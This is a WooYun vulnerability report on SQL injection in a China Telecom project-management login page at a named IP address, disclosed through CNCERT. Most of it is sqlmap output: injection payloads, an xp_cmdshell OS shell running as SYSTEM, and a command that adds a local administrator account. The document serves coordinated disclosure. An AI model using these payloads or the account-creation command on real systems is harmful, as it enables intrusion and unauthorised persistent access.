当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127578

漏洞标题:中国电信某项目管理系统存在SQL注入导致服务器沦陷

相关厂商:中国电信

漏洞作者: 土{2}

提交时间:2015-07-21 19:24

修复时间:2015-09-07 15:52

公开时间:2015-09-07 15:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-24: 厂商已经确认,细节仅向厂商公开
2015-08-03: 细节向核心白帽子及相关领域专家公开
2015-08-13: 细节向普通白帽子公开
2015-08-23: 细节向实习白帽子公开
2015-09-07: 细节向公众公开

简要描述:

RT

详细说明:

post注入http://219.144.186.149/login.aspx

Parameter: logName (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=dDwtMTMxMzA2ODI5ODs7PtR5hoqStO3R9pZPxCh7FhZY3BRU&logName=admin' AND 1488=CONVERT(INT,(SELECT CH
AR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1488=1488) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(11
3)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'RENn'='RENn&psw=admin&Button1=%E7%99%BB%E9%99%86
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=dDwtMTMxMzA2ODI5ODs7PtR5hoqStO3R9pZPxCh7FhZY3BRU&logName=admin';WAITFOR DELAY '0:0:5'--&psw=adm
in&Button1=%E7%99%BB%E9%99%86
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: __VIEWSTATE=dDwtMTMxMzA2ODI5ODs7PtR5hoqStO3R9pZPxCh7FhZY3BRU&logName=admin' WAITFOR DELAY '0:0:5'--&psw=adm
in&Button1=%E7%99%BB%E9%99%86
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: __VIEWSTATE=dDwtMTMxMzA2ODI5ODs7PtR5hoqStO3R9pZPxCh7FhZY3BRU&logName=admin' UNION ALL SELECT CHAR(113)+CHAR
(122)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(65)+CHAR(89)+CHAR(122)+CHAR(104)+CHAR(120)+CHAR(120)+CHAR(102)+CHAR(109)+CHAR(9
7)+CHAR(105)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &psw=admin&Button1=%
E7%99%BB%E9%99%86
---
[15:30:09] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2000
[15:30:09] [WARNING] reflective value(s) found and filtering out
[15:30:09] [INFO] fingerprinting the back-end DBMS operating system version and service pack
[15:30:10] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 0
[15:30:10] [INFO] testing if current user is DBA
[15:30:10] [INFO] checking if xp_cmdshell extended procedure is available, please wait..
[15:30:20] [WARNING] time-based standard deviation method used on a model with less than 30 response times
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[15:30:24] [INFO] xp_cmdshell extended procedure is available
[15:30:24] [INFO] testing if xp_cmdshell extended procedure is usable
[15:30:25] [INFO] the SQL query used returns 1 entries
[15:30:25] [INFO] xp_cmdshell extended procedure is usable
[15:30:25] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[15:30:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
[15:30:32] [INFO] the SQL query used returns 1 entries
command standard output: 'nt authority\system'
os-shell> net user test wooyun /add & net localgroup administrators test /add
do you want to retrieve the command standard output? [Y/n/a] y
[15:32:39] [INFO] the SQL query used returns 2 entries
command standard output: '命令成功完成。'


QQ图片20150718183750.jpg

漏洞证明:

QQ图片20150717171924.png


2.png

修复方案:

过滤

版权声明:转载请注明来源 土{2}@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-24 15:51

厂商回复:

CNVD确认所述情况,转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置.

最新状态:

暂无